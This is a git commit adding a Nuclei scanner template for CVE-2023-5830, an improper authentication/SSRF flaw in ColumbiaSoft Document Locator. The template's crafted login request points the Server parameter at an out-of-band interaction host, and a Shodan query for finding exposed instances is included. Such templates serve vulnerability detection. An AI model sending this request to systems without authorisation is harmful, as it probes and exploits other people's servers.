Merge pull request #9364 from projectdiscovery/princechaddha-patch-3

Create CVE-2023-5830.yaml
2024-03-19 10:30:40 +05:30 · 2024-03-19 10:30:40 +05:30 · 9d67876c62
parent 5bd8e44c8e f74050c474
commit 9d67876c62
1 changed files with 62 additions and 0 deletions
--- a/http/cves/2023/CVE-2023-5830.yaml
+++ b/http/cves/2023/CVE-2023-5830.yaml
@ -0,0 +1,62 @@
+id: CVE-2023-5830
+
+info:
+  name: ColumbiaSoft DocumentLocator - Improper Authentication
+  author: Gonski
+  severity: critical
+  description: |
+    Instances of ColumbiaSoft's Document Locator prior to version 7.2 SP4 and 2021.1 are vulnerable to an Improper Authentication/SSRF vulnerability. This template identifies vulnerable instances of the ColumbiaSoft Document Locater application by confirming external DNS interaction/lookups by modifying the value of the client-side SERVER parameter at /api/authentication/login.
+  impact: |
+    An attacker could exploit this vulnerability to gain unauthorized access to sensitive information.
+  remediation: |
+    Upgrade to a patched version of ColumbiaSoft DocumentLocator to fix the improper authentication issue.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-5830
+    - https://vuldb.com/?ctiid.243729
+    - https://github.com/advisories/GHSA-j89v-wm7x-4434
+    - https://vuldb.com/?id.243729
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2023-5830
+    cwe-id: CWE-287
+    epss-score: 0.00091
+    epss-percentile: 0.37579
+    cpe: cpe:2.3:a:documentlocator:document_locator:*:*:*:*:*:*:*:*
+  metadata:
+    max-request: 1
+    vendor: documentlocator
+    product: document_locator
+    shodan-query: 'title:"Document Locator - WebTools"'
+  tags: cve,cve2023,ssrf,unauth,columbiasoft,intrusive,webtools
+
+http:
+  - raw:
+      - |
+        @timeout: 20s
+        POST /api/authentication/login HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/json;charset=UTF-8
+        Origin: {{BaseURL}}
+        Referer: {{BaseURL}}
+
+        {
+          "LoginType":"differentWindows",
+          "User":"{{randstr}}",
+          "Password":"{{rand_base(5, "abc")}}",
+          "Domain":"{{randstr}}",
+          "Server":"{{interactsh-url}}",
+          "Repository":"{{randstr}}"
+        }
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: interactsh_protocol
+        words:
+          - "dns"
+
+      - type: word
+        part: body
+        words:
+          - '"Authorized":false'